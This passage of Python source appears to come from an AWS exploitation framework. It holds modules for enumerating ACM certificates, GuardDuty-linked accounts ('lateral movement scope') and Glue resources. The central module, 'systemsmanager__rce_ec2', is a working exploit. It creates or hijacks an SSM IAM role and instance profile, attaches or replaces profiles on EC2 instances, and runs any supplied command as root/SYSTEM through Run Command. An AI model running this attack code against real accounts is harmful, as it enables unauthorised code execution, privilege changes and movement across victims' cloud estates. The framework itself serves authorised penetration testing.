                        response = client.list_certificates(NextToken=next_token, MaxItems=50)
                    else:
                        response = client.list_certificates(MaxItems=50)

                    certs_list = response['CertificateSummaryList']
                    if certs_list:
                        num_certs_found = len(certs_list)
                        print('Found {} certs for region: {}'.format(len(certs_list), region))
                        data['num_certs'] += num_certs_found

                        if region not in data['certs']:
                            data['certs'][region] = []
                        data['certs'][region].extend(certs_list)

                    if 'NextToken' in response:
                        next_token = response['NextToken']
                    else:
                        finished = True

                except Exception as err:
                    print("Exception listing ACM Certificate ARNs for region: {}".format(region))
                    print("    Error: {}, {}".format(err.__class__, str(err)))

        if args.all or args.certs_expired_list:

            # To get to each certs page
            next_token = None
            finished = False

            certs_list = []
            while not finished:
                try:
                    print("Listing ACM certificate ARNs which are EXPIRED for region: {}".format(region))
                    if next_token:
                        response = client.list_certificates(
                            CertificateStatuses=['EXPIRED'],
                            NextToken=next_token,
                            MaxItems=50
                        )
                    else:
                        response = client.list_certificates(
                            CertificateStatuses=['EXPIRED'],
                            MaxItems=50
                        )

                    certs_list = response['CertificateSummaryList']
                    if certs_list:
                        num_certs_found = len(certs_list)
                        print('Found {} expired cert(s) for region: {}'.format(len(certs_list), region))
                        data['num_certs_expired'] += num_certs_found

                        if region not in data['certs_expired']:
                            data['certs_expired'][region] = []
                        data['certs_expired'][region].extend(certs_list)

                    if 'NextToken' in response:
                        next_token = response['NextToken']
                    else:
                        finished = True

                except Exception as err:
                    print("Exception listing Expired ACM Certificate ARNs for region: {}".format(region))
                    print("    Error: {}, {}".format(err.__class__, str(err)))

        if args.all or args.certs_chain:

            if region in data['certs'] and data['certs'][region]:
                print("Getting certs, and their chain for region: {}".format(region))
                try:
                    for cert_arn_domain in data['certs'][region]:
                        cert_arn = cert_arn_domain.get('CertificateArn', '')
                        domain = cert_arn_domain.get('DomainName', '')

                        print("Getting info about cert: {} for region: {}".format(cert_arn, region))
                        response = client.get_certificate(CertificateArn=cert_arn)

                        data['certs_chain'][cert_arn] = response

                except Exception as err:
                    print("Exception getting ACM Certificate ARN: {}, Domain: {} for region: {}".format(cert_arn, domain, region))
                    print("    Error: {}, {}".format(err.__class__, str(err)))

        if args.all or args.certs_info:

            if region in data['certs'] and data['certs'][region]:
                print("Describing certs: {}".format(region))

                try:
                    for cert_arn_domain in data['certs'][region]:
                        cert_arn = cert_arn_domain.get('CertificateArn', '')
                        domain = cert_arn_domain.get('DomainName', '')

                        print("Getting info about cert: {} for region: {}".format(cert_arn, region))
                        response = client.describe_certificate(CertificateArn=cert_arn)

                        data['certs_info'][cert_arn] = response

                except Exception as err:
                    print("Exception getting ACM Certificate ARN: {}, Domain: {} for region: {}".format(cert_arn, domain, region))
                    print("    Error: {}, {}".format(err.__class__, str(err)))

        if args.all or args.ca_list:

            # To get to each certs page
            next_token = None
            finished = False

            while not finished:
                try:
                    print("Listing ACM Private CAs for region: {}".format(region))
                    if next_token:
                        response = ca_client.list_certificate_authorities(
                            NextToken=next_token,
                            MaxResults=50
                        )
                    else:
                        response = ca_client.list_certificate_authorities(
                            MaxResults=50
                        )

                    ca_list = response['CertificateAuthorities']
                    if ca_list:
                        num_cas_found = len(ca_list)
                        print('Found {} CAs for region: {}'.format(len(ca_list),
                            region))
                        data['num_cas'] += num_cas_found

                        if region not in data['cas']:
                            data['cas'][region] = []
                        data['certs'][region].extend(ca_list)

                    if 'NextToken' in response:
                        next_token = response['NextToken']
                    else:
                        finished = True

                except Exception as err:
                    print("Exception listing ACM CAs for region: {}".format(region))
                    print("    Error: {}, {}".format(err.__class__, str(err)))


    # Prepare the out file names to write output data to
    now = time.time()
    outfiles = {}
    outfiles['certs'] = str(downloads_dir()/'acm_enum_certs_{}.json').format(now)
    outfiles['certs_info'] = str(downloads_dir()/'acm_enum_certs_info_{}.json'.format(now))
    outfiles['certs_chain'] = str(downloads_dir()/'acm_enum_certs_chain_{}.json').format(now)
    outfiles['cas'] = str(downloads_dir()/'acm_enum_cas_{}.json').format(now)
    outfiles['certs_expired'] = str(downloads_dir()/'acm_enum_certs_expired_{}.json').format(now)

    # Write the relevant output to the output files
    for info_type, outfile in outfiles.items():
        if data[info_type]:
            print("Writing info: {} to outfile: {}".format(info_type, outfile))
            with open(outfile, 'w+') as f:
                f.write(
                    json.dumps(
                        data[info_type],
                        indent=4,
                        default=str
                    )
                )

    # Write the info about certs to outfile
    return data


def summary(data, pacu_main):
    msg = """
Found {} certificate(s) in ACM

Found {} Private CA(s) in ACM

Found {} expired certificate(s) in ACM
""".format(
        data['num_certs'],
        data['num_cas'],
        data['num_certs_expired']
)

    return msg



#!/usr/bin/env python3
import argparse
import copy
import re
import time
from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'systemsmanager__rce_ec2',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'EXPLOIT',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Tries to execute code as root/SYSTEM on EC2 instances.',

    # Full description about what the module does and how it works
    'description': 'This module tries to execute arbitrary code on EC2 instances as root/SYSTEM using EC2 Systems Manager. To do so, it will first try to enumerate EC2 instances that are running operating systems that have the Systems Manager agent installed by default. Then, it will attempt to find the Systems Manager IAM instance profile, or try to create it if it cannot find it. If successful, it will try to attach it to the instances enumerated earlier. Then it will use EC2 Run Command to execute arbitrary code on the EC2 instances as either root (Linux) or SYSTEM (Windows). Note: Linux targets will run the command using their default shell (bash/etc.) and Windows hosts will run the command using PowerShell, so be weary of that when trying to run the same command against both operating systems. NOTE: Sometimes Systems Manager Run Command can delay the results of a call by a random amount. I have experienced 15 minute delays before my command was executed on the target, so if this module successfully completes and it seems that your command did not execute like it was supposed to, then wait at least 15 minutes before trying again.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['EC2', 'SSM'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': ['ec2__enum', 'iam__enum_users_roles_policies_groups'],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--command', '--target-os', '--all-instances', '--replace', '--ip-name'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--command', required=True, default=None, help='The shell command to run on the targeted EC2 instances')
parser.add_argument('--target-os', required=False, default='All', help='This argument is what operating systems to target. Valid options are: Windows, Linux, or All. The default is All')
parser.add_argument('--all-instances', required=False, default=False, action='store_true', help='Skip vulnerable operating system check and just target every instance')
parser.add_argument('--target-instances', required=False, default=None, help='A comma-separated list of instances and regions to set as the attack targets in the format of instance-id@region,instance2-id@region...')
parser.add_argument('--replace', required=False, default=False, action='store_true', help='For EC2 instances that already have an instance profile attached to them, this argument will replace those with the Systems Manager instance profile. WARNING: This can cause bad things to happen! You never know what negative side effects this may have on a server without further inspection, because you do not know what permissions you are removing/replacing that the instance already had')
parser.add_argument('--ip-name', required=False, default=None, help='The name of an existing instance profile with an "EC2 Role for Simple Systems Manager" attached to it. This will skip the automatic role/instance profile enumeration and the searching for a Systems Manager role/instance profile')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions
    ######

    summary_data = {}

    # Make sure args.target_os equals one of All, Windows, or Linux
    if not (args.target_os.lower() == 'all' or args.target_os.lower() == 'windows' or args.target_os.lower() == 'linux'):
        print('Invalid option specified for the --target-os argument. Valid options include: All, Windows, or Linux. If --target-os is not specified, the default is All.\n')
        return

    # Make sure --all-instances and --target-instances are not passed in together
    if args.all_instances is True and args.target_instances is not None:
        print('Invalid arguments received. Expecting one or zero of --all-instances and --target-instances, received both.\n')
        return

    if args.target_instances is None: # If --target-instances is not specified, then we need to enumerate instances
        if fetch_data(['EC2', 'Instances'], module_info['prerequisite_modules'][0], '--instances') is False:
            print('Pre-req module not run successfully. Exiting...\n')
            return
        instances = session.EC2['Instances']
        regions = get_regions('EC2')

    targeted_instances = []
    ssm_role_name = ''
    ssm_instance_profile_arn = None
    if args.ip_name is not None:
        ssm_instance_profile_name = args.ip_name
    else:
        ssm_instance_profile_name = ''

    if args.all_instances is False and args.target_instances is None:
        os_with_default_ssm_agent = [
            '[\s\S]*Windows[\s\S]*Server[\s\S]*',
            '[\s\S]*Amazon[\s\S]*Linux[\s\S]*',
            '[\s\S]*Ubuntu[\s\S]*Server[\s\S]*16\\.04[\s\S]*',
            '[\s\S]*Ubuntu[\s\S]*Server[\s\S]*18\\.04[\s\S]*',
            # 'Windows Server 2003-2012 R2 released after November 2016'
        ]

        # Begin enumeration of vulnerable images
        vuln_images = []
        for region in regions:
            image_ids = []
            print('Starting region {}...'.format(region))
            client = pacu_main.get_boto3_client('ec2', region)

            for instance in instances:
                if instance['Region'] == region:
                    image_ids.append(instance['ImageId'])

            # Describe all images being used in the environment
            if image_ids == []:
                print('  No images found.\n')
            else:
                try:
                    images = client.describe_images(
                        ImageIds=list(set(image_ids))
                    )['Images']
                except ClientError as error:
                    code = error.response['Error']['Code']
                    print('FAILURE: ')
                    if code == 'UnauthorizedOperation':
                        print('  Access denied to DescribeImages.')
                    else:
                        print('  ' + code)
                    print('Consider manual operating system enumeration techniques and pass them to the --target-instances argument.')
                    return None

                # Iterate images and determine if they are possibly one of the
                # operating systems with SSM agent installed by default
                count = 0
                for image in images:
                    os_details = '{} {} {}'.format(
                        image['Description'],
                        image['ImageLocation'],
                        image['Name']
                    )
                    for vuln_os in os_with_default_ssm_agent:
                        result = re.match(r'{}'.format(vuln_os), os_details)
                        if result is not None:
                            count += 1
                            vuln_images.append(image['ImageId'])
                            break
                print('  {} vulnerable images found.\n'.format(count))
        print('Total vulnerable images found: {}\n'.format(len(vuln_images)))

    if ssm_instance_profile_name == '':
        # Begin Systems Manager role finder/creator
        client = pacu_main.get_boto3_client('iam')

        ssm_policy = client.get_policy(
            PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM'
        )['Policy']

        if ssm_policy['AttachmentCount'] > 0:
            if fetch_data(['IAM', 'Roles'], module_info['prerequisite_modules'][1], '--roles') is False:
                print('Pre-req module not run successfully. Exiting...\n')
                return
            roles = session.IAM['Roles']

            # For each role that exists in the account
            for role in roles:
                # For each AssumeRole statement
                for statement in role['AssumeRolePolicyDocument']['Statement']:
                    # Statement->Principal could be a list or a dict
                    if type(statement['Principal']) is list:
                        # For each item in the list, check if ec2.amazonaws.com is in it
                        for principal in statement['Principal']:
                            if 'ec2.amazonaws.com' in principal:
                                attached_policies = client.list_attached_role_policies(
                                    RoleName=role['RoleName'],
                                    PathPrefix='/service-role/'
                                )['AttachedPolicies']

                                # It is an EC2 role, now figure out if it is an SSM EC2
                                # role by checking for the SSM policy being attached
                                for policy in attached_policies:
                                    if policy['PolicyArn'] == 'arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM':
                                        ssm_role_name = role['RoleName']
                                        break
                                if not ssm_role_name == '':
                                    break
                        if not ssm_role_name == '':
                            break
                    elif type(statement['Principal']) is dict:
                        # For each key in the dict, check if it equal ec2.amazonaws.com
                        for key in statement['Principal']:
                            if statement['Principal'][key] == 'ec2.amazonaws.com':
                                attached_policies = client.list_attached_role_policies(
                                    RoleName=role['RoleName']
                                )['AttachedPolicies']

                                # It is an EC2 role, now figure out if it is an SSM EC2
                                # role by checking for the SSM policy being attached
                                for policy in attached_policies:
                                    if policy['PolicyArn'] == 'arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM':
                                        ssm_role_name = role['RoleName']
                                        break
                                if not ssm_role_name == '':
                                    break
                        if not ssm_role_name == '':
                            break
                if not ssm_role_name == '':
                    break
        if ssm_role_name == '':
            print('Did not find valid EC2 SystemsManager service role (which means there is no instance profile either). Trying to create one now...\n')
            try:
                # Create the SSM role
                create_response = client.create_role(
                    RoleName='SSM',
                    AssumeRolePolicyDocument='{"Version": "2012-10-17", "Statement": [{"Sid": "", "Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"}]}'
                )['Role']

                ssm_role_name = create_response['RoleName']

                # Attach the SSM policy to the role just created
                client.attach_role_policy(
                    RoleName=ssm_role_name,
                    PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM'
                )
                print('  Successfully created the required role: {}\n'.format(create_response['Arn']))
            except Exception as error:
                print('  Unable to create the required role: {}\n'.format(str(error)))
                return
        else:
            print('Found valid SystemsManager service role: {}. Checking if it is associated with an instance profile...\n'.format(ssm_role_name))

            # Find instance profile belonging to that role
            response = client.list_instance_profiles_for_role(
                RoleName=ssm_role_name,
                MaxItems=1
            )

            if len(response['InstanceProfiles']) > 0:
                ssm_instance_profile_name = response['InstanceProfiles'][0]['InstanceProfileName']
                ssm_instance_profile_arn = response['InstanceProfiles'][0]['Arn']
                ssm_instance_profile_id = response['InstanceProfiles'][0]['InstanceProfileId']
                print('Found valid instance profile: {}.\n'.format(ssm_instance_profile_name))
            # Else, leave ssm_instance_profile_name == ''

        # If no instance profile yet, create one with the role we have
        if ssm_instance_profile_name == '':
            # There is no instance profile yet
            try:
                # Create a new instance profile
                response = client.create_instance_profile(
                    InstanceProfileName='SSM'
                )['InstanceProfile']

                ssm_instance_profile_name = response['InstanceProfileName']
                ssm_instance_profile_arn = response['Arn']
                ssm_instance_profile_id = response['InstanceProfileId']

                # Attach our role to the new instance profile
                client.add_role_to_instance_profile(
                    InstanceProfileName=ssm_instance_profile_name,
                    RoleName=ssm_role_name
                )
            except Exception as error:
                print('  Unable to create an instance profile: {}\n'.format(str(error)))
                return

    # If there are target instances passed in as arguments, get the EC2 info for those
    if args.target_instances is not None:
        instances = []
        regions = []
        instances_id_regions = args.target_instances.split(',')
        for instance_id_region in instances_id_regions:
            instance_id, instance_region = instance_id_region.split('@')
            regions.append(instance_region)
            client = pacu_main.get_boto3_client('ec2', instance_region)
            instance = client.describe_instances(InstanceIds=[instance_id])["Reservations"][0]["Instances"][0]
            instance["Region"] = instance_region
            instances.append(instance)
        # Kill duplicate regions
        regions = list(set(regions))

    # Start attaching the instance profile to the vulnerable instances
    print('Starting to attach the instance profile to target EC2 instances...\n')
    # args.replace is the static argument passed in from the user, but the
    # variable replace can be modified in cases where the call is failing,
    # likely due to permissions, but I give the user a choice below in the
    # error handling section
    replace = args.replace

    ec2_data = copy.deepcopy(session.EC2)

    for region in regions:
        client = pacu_main.get_boto3_client('ec2', region)
        # instances_to_replace will be filled up as each instance is checked for
        # each region. The describe_iam_instance_profile_associations API call
        # supports multiple instance IDs as filters, so by collecting a list and
        # then running the API call once for all IDs, it minimizes the amount of
        # total API calls made.
        instances_to_replace = []
        for instance in instances:
            if instance['State']['Name'] == 'running' or instance['State']['Name'] == 'stopped':
                if instance['Region'] == region:
                    if args.target_instances is not None or args.all_instances is True or instance['ImageId'] in vuln_images:
                        if 'IamInstanceProfile' in instance:
                            # The instance already has an instance profile attached, add it to
                            # targets if it is an SSM instance profile, skip it if args.replace
                            # is not True, otherwise add it to instances_to_replace
                            if instance['IamInstanceProfile']['Arn'] == ssm_instance_profile_arn:
                                print('  Instance ID {} already has a Systems Manager instance profile attached to it. Adding to target list...\n'.format(instance['InstanceId']))
                                targeted_instances.append(instance['InstanceId'])
                            elif args.replace is True and replace is True:
                                instances_to_replace.append(instance['InstanceId'])
                            else:
                                if args.target_instances is not None:
                                    print('  Instance ID {} already has an instance profile attached to it, will try to attack anyways...'.format(instance['InstanceId']))
                                    targeted_instances.append(instance['InstanceId'])
                                else:
                                    print('  Instance ID {} already has an instance profile attached to it, skipping...'.format(instance['InstanceId']))
                                pass
                        else:
                            # There is no instance profile attached yet, do it now
                            response = client.associate_iam_instance_profile(
                                InstanceId=instance['InstanceId'],
                                IamInstanceProfile={
                                    'Arn': ssm_instance_profile_arn,
                                    'Name': ssm_instance_profile_name
                                }
                            )
                            targeted_instances.append(instance['InstanceId'])
                            for instance_in_db in ec2_data['Instances']:
                                if 'IamInstanceProfile' not in instance_in_db:
                                    instance_in_db['IamInstanceProfile'] = {}

                                if instance_in_db['InstanceId'] == instance['InstanceId']:
                                    instance_in_db['IamInstanceProfile']['Arn'] = ssm_instance_profile_arn
                                    instance_in_db['IamInstanceProfile']['Id'] = ssm_instance_profile_id
                                    break
                            print('  Instance profile attached to instance ID {}.'.format(instance['InstanceId']))
        if len(instances_to_replace) > 0 and replace is True:
            # There are instances that need their role replaced, so discover association IDs to make that possible
            all_associations = []
            response = client.describe_iam_instance_profile_associations(
                Filters=[
                    {
                        'Name': 'instance-id',
                        'Values': instances_to_replace
                    }
                ]
            )
            all_associations.extend(response['IamInstanceProfileAssociations'])
            while 'NextToken' in response:
                response = client.describe_iam_instance_profile_associations(
                    NextToken=response['NextToken'],
                    Filters=[
                        {
                            'Name': 'instance-id',
                            'Values': instances_to_replace
                        }
                    ]
                )
                all_associations.extend(response['IamInstanceProfileAssociations'])

            # Start replacing the instance profiles
            for instance_id in instances_to_replace:
                for association in all_associations:
                    if instance_id == association['InstanceId']:
                        association_id = association['AssociationId']
                        break
                try:
                    client.replace_iam_instance_profile_association(
                        AssociationId=association_id,
                        IamInstanceProfile={
                            'Name': ssm_instance_profile_name
                        }
                    )
                    targeted_instances.append(instance_id)
                    for instance_in_db in ec2_data['Instances']:
                        if instance_in_db['InstanceId'] == instance['InstanceId']:
                            instance_in_db['IamInstanceProfile']['Arn'] = ssm_instance_profile_arn
                            instance_in_db['IamInstanceProfile']['Id'] = ssm_instance_profile_id
                            break
                    print('  Instance profile replaced for instance ID {}.'.format(instance_id))
                except Exception as error:
                    print('  Failed to run replace_iam_instance_profile_association on instance ID {}: {}\n'.format(instance_id, str(error)))
                    replace = input('Do you want to keep trying to replace instance profiles, or skip the rest based on the error shown? (y/n) ')
                    if replace == 'y':
                        replace = True
                    else:
                        replace = False
                        break

    session.update(pacu_main.database, EC2=ec2_data)
    print('\n  Done.\n')

    # Start polling SystemsManager/RunCommand to see if instances show up
    print('Waiting for targeted instances to appear in Systems Manager... This will be checked every 30 seconds for 10 minutes (or until all targeted instances have shown up, whichever is first). After each check, the shell command will be executed against all new instances that showed up since the last check. If an instance has not shown up after 10 minutes, it most likely means that it does not have the SSM Agent installed and is not vulnerable to this attack.\n')

    # Check 20 times in 30 second intervals (10 minutes) or until all targeted instances have been attacked
    discovered_instances = []
    attacked_instances = []
    ignored_instances = []
    for i in range(1, 21):
        this_check_attacked_instances = []
        for region in regions:
            # Accumulate a list of instances to attack to minimize the amount of API calls being made
            windows_instances_to_attack = []
            linux_instances_to_attack = []
            client = pacu_main.get_boto3_client('ssm', region)

            # Enumerate instances that appear available to Systems Manager
            try:
                response = client.describe_instance_information()
                for instance in response['InstanceInformationList']:
                    discovered_instances.append([instance['InstanceId'], instance.get('PlatformType', None)])
                while 'NextToken' in response:
                    response = client.describe_instance_information(
                        NextToken=response['NextToken']
                    )
                    for instance in response['InstanceInformationList']:
                        discovered_instances.append([instance['InstanceId'], instance.get('PlatformType', None)])
            except ClientError:
                print('  Access denied to DescribeInstanceInformation in region {}.\n'.format(region))
                continue

            ignore_all = False
            for instance in discovered_instances:
                # Has this instance been attacked yet?
                if instance[0] not in attacked_instances and instance[0] not in ignored_instances:
                    if args.target_os.lower() == 'all' or instance[1].lower() == args.target_os.lower():
                        # Is this instance eligible for an attack, but was not targeted?
                        if instance[0] not in targeted_instances:
                            if ignore_all:
                                ignored_instances.append(instance[0])
                                continue
                            action = input('  Instance ID {} (Platform: {}) was not found in the list of targeted instances, but it might be possible to attack it, do you want to try and attack this instance (a) or ignore it (i) or ignore all (I)? (a/i/I) '.format(instance[0], instance[1]))
                            if action == 'i':
                                ignored_instances.append(instance[0])
                                continue
                            if action == 'I':
                                ignored_instances.append(instance[0])
                                ignore_all = True
                                continue
                            else:
                                print('  Adding instance ID {} to list of targets.\n'.format(instance[0]))
                                targeted_instances.append(instance[0])
                        if instance[1].lower() == 'windows':
                            windows_instances_to_attack.append(instance[0])
                        elif instance[1].lower() == 'linux':
                            linux_instances_to_attack.append(instance[0])
                        else:
                            print('  Unknown operating system for instance ID {}: {}. Not attacking it...\n'.format(instance[0], instance[1]))

            # Collectively attack all new instances that showed up in the last check for this region

            # Windows
            if len(windows_instances_to_attack) > 0 and (args.target_os.lower() == 'all' or args.target_os.lower() == 'windows'):
                params = {
                    'commands': [args.command]
                }
                response = client.send_command(
                    InstanceIds=windows_instances_to_attack,
                    DocumentName='AWS-RunPowerShellScript',
                    MaxErrors='100%',
                    Parameters=params
                )
                this_check_attacked_instances.extend(windows_instances_to_attack)
                attacked_instances.extend(windows_instances_to_attack)

            # Linux
            if len(linux_instances_to_attack) > 0 and (args.target_os.lower() == 'all' or args.target_os.lower() == 'linux'):
                params = {
                    'commands': [args.command]
                }
                response = client.send_command(
                    InstanceIds=linux_instances_to_attack,
                    DocumentName='AWS-RunShellScript',
                    MaxErrors='100%',
                    Parameters=params
                )
                this_check_attacked_instances.extend(linux_instances_to_attack)
                attacked_instances.extend(linux_instances_to_attack)

        print('  {} new instances attacked in the latest check: {}\n'.format(len(this_check_attacked_instances), this_check_attacked_instances))

        if attacked_instances == targeted_instances:
            # All targeted instances have been attacked, stop polling every 30 seconds
            break

        # Don't wait 30 seconds after the very last check
        if not i == 20:
            print('Waiting 30 seconds...\n')
            time.sleep(30)

    summary_data = {'instances': len(attacked_instances)}

    if i == 20:
        # We are here because it has been 10 minutes
        print('It has been 10 minutes, if any target instances were not successfully attacked, then that most likely means they are not vulnerable to this attack (most likely the SSM Agent is not installed on the instances).\n')
        print('Successfully attacked the following instances: {}\n'.format(attacked_instances))
        summary_data['all'] = False
    else:
        # We are here because all targeted instances have been attacked
        print('All targeted instances showed up and were attacked.\n')
        print('Successfully attacked the following instances: {}\n'.format(attacked_instances))
        summary_data['all'] = True

    return


def summary(data, pacu_main):
    if isinstance(data, None):
        return '  Module did not complete successfully'
    if data['all']:
        out = '  All instances were successfully attacked.\n'
    else:
        out = '  Not all instances responded in time.\n'
    out += '    {} instances were successfully attacked'.format(data['instances'])
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import copy
import string
import random
import json

module_info = {
    'name': 'guardduty__list_accounts',
    'author': 'Manas Bellani',
    'category': 'ENUM',
    'one_liner': (
        'List GuardDuty master account, and other accounts that are linked to GuardDuty which can provide us more lateral '
        'movement scope'
    ),
    'description': (
        'This module list accounts that are linked to the current GuardDuty account which provides list of more accounts that '
        'we can laterally move into. The module also determines the master account that acts as the administration account '
        'for GuardDuty, and also any other accounts within the organization'
    ),
    'services': ['GuardDuty'],
    'prerequisite_modules': ['detection__enum_services'],
    'external_dependencies': [],
    'arguments_to_autocomplete': [],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--regions', required=False, default=None, help='The set of regions to enumerate GuardDuty in (defaults '
                                                                    'to all session regions).')


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions

    data = {'detectors': [], 'accounts': []}

    
    regions = args.regions or get_regions('GuardDuty')
    if fetch_data(['GuardDuty', 'Detectors'], module_info['prerequisite_modules'][0], '--guard-duty') is False:
        print('Pre-req module failed.')
        return
    detectors = copy.deepcopy(session.GuardDuty['Detectors'])

    # To get to each
    next_token = None

    for detector in detectors:
        region = detector['Region']
        detector_id = detector['Id']

        if region not in regions:
            print(f"Skipping {detector_id} in ignored region (to change this use set_regions or pass --region to this module)")
            continue

        # Get the guardduty client for the region
        client = pacu_main.get_boto3_client('guardduty', region)

        print(' ({}) Detector {}:'.format(region, detector_id))
        data['detectors'].append(detector_id)
        try:

            # Enumerate accounts in each region
            finished_getting_accounts = False
            while not finished_getting_accounts:

                # Make the request to get the member accounts
                if next_token:
                    response = client.list_members(
                        DetectorId=detector_id,
                        MaxResults=50,
                        NextToken=next_token,
                        OnlyAssociated="false"
                    )
                else:
                    response = client.list_members(DetectorId=detector_id, MaxResults=50, OnlyAssociated="false")

                # Get the next set of member accounts
                if 'NextToken' in response:
                    next_token = response['NextToken']
                else:
                    finished_getting_accounts = True

                if 'Members' in response and len(response['Members']) > 0:
                    print(f"    Found member accounts for {detector_id}:")
                for member in response.get('Members', []):
                    print(f"    MemberAccount: {member['AccountId']}, MasterAccount: {member['MasterId']}")
                    data['accounts'].extend([member['AccountId'], member['MasterId']])

        except Exception as err:
            if 'not owned by the current account' not in err.args[0]:
                print("Exception listing GuardDuty member accounts for region: {}, detector: {}".format(region, detector_id))
                print("    Error: {}, {}".format(err.__class__, str(err)))


        # Listing the guardduty organizational admin accounts
        try:
            finished_getting_accounts = False
            next_token = None
            while not finished_getting_accounts:
                if next_token:
                    response = client.list_organization_admin_accounts(NextToken=next_token, MaxResults=50)
                else:
                    response = client.list_organization_admin_accounts(MaxResults=50)

                if 'AdminAccounts' in response:
                    print(f"    Found GuardDuty Admin Account {response['AdminAccounts']}")
                    data['accounts'].append(response['AdminAccounts'])
                else:
                    print("   No AdminAccounts account found for region: {}, detector: {}".format(region, detector_id))

                # check if we need to get the next token for more accounts
                if 'NextToken' in response:
                    next_token = response['NextToken']
                else:
                    finished_getting_accounts = True

        except Exception as err:
            # Can only be run from the master account.
            if 'because you are not the master account' not in err.args[0]:
                print("Exception determining GuardDuty Organizational AdminAccounts for region: {}, detector: {}".format(region, detector_id))
                print("    Error: {}, {}".format(err.__class__, str(err)))


        # List the guardduty master account
        try:
            response = client.get_master_account(DetectorId=detector_id)

            if 'Master' in response:
                print(f"    Found GuardDuty Master account: {response['Master']['AccountId']}")
                data['accounts'].append(response['Master']['AccountId'])
        except Exception as err:
            if 'not owned by the current account' not in err.args[0]:
                print("Exception determining GuardDuty master account for region: {}, detector: {}".format(region, detector_id))
                print("    Error: {}, {}".format(err.__class__, str(err)))

    return data


def summary(data, pacu_main):
    if not data['accounts']:
        return "No account ID's found"
    msg = ''
    msg += 'Accounts found:\n'
    for account in set(data['accounts']):
        msg += f"    {account}\n"
    return msg



#!/usr/bin/env python3
import argparse
from copy import deepcopy

from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'glue__enum',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates Glue connections, crawlers, databases, development endpoints, and jobs.',

    # Full description about what the module does and how it works
    'description': 'This module enumerates all relevant data from AWS Glue, including connections, crawlers, databases, development endpoints, and jobs. By default, everything will be enumerated, but by passing available arguments, you can specify what data you want. For example, if any arguments are passed in, only the passed in arguments will be enumerated, but if either all or no arguments are passed in, everything will be enumerated.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['Glue'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': [
        '--regions',
        '--connections',
        '--crawlers',
        '--databases',
        '--dev-endpoints',
        '--jobs'
    ],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format us-east-1. Defaults to all session regions.')
parser.add_argument('--connections', required=False, default=False, action='store_true', help='Enumerate Glue connections.')
parser.add_argument('--crawlers', required=False, default=False, action='store_true', help='Enumerate Glue crawlers.')
parser.add_argument('--databases', required=False, default=False, action='store_true', help='Enumerate Glue databases.')
parser.add_argument('--dev-endpoints', required=False, default=False, action='store_true', help='Enumerate Glue development endpoints.')
parser.add_argument('--jobs', required=False, default=False, action='store_true', help='Enumerate Glue jobs.')


def fetch_glue_data(client, func, key, print, **kwargs):
    caller = getattr(client, func)
    try:
        response = caller(**kwargs)
        data = response[key]
        while 'NextToken' in response and response['NextToken'] != '':
            print({**kwargs, **{'NextToken': response['NextToken']}})
            response = caller({**kwargs, **{'NextToken': response['NextToken']}})
            data.extend(response[key])
        for resource in data:
            resource['region'] = client.meta.region_name
        return data
    except ClientError as error:
        code = error.response['Error']['Code']
        if code == 'AccessDeniedException':
            print('  {} FAILURE: MISSING NEEDED PERMISSIONS'.format(func))
        else:
            print(code)
    return []


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    ######

    if args.connections is False and args.databases is False and args.crawlers is False and args.jobs is False and args.dev_endpoints is False:
        args.connections = args.databases = args.crawlers = args.jobs = args.dev_endpoints = True
    if args.regions is None:
        regions = get_regions('glue')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')

    all_connections = []
    all_crawlers = []
    all_databases = []
    all_dev_endpoints = []
    all_jobs = []
    for region in regions:
        print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('glue', region)

        # Connections
        if args.connections:
            connections = fetch_glue_data(client, 'get_connections', 'ConnectionList', print)
            print('  {} connection(s) found.'.format(len(connections)))
            all_connections += connections

        # Crawlers
        if args.crawlers:
            crawlers = fetch_glue_data(client, 'get_crawlers', 'Crawlers', print)
            print('  {} crawler(s) found.'.format(len(crawlers)))
            all_crawlers += crawlers

        # Databases
        if args.databases:
            databases = fetch_glue_data(client, 'get_databases', 'DatabaseList', print)
            print('  {} database(s) found.'.format(len(databases)))
            all_databases += databases

        # Development Endpoints
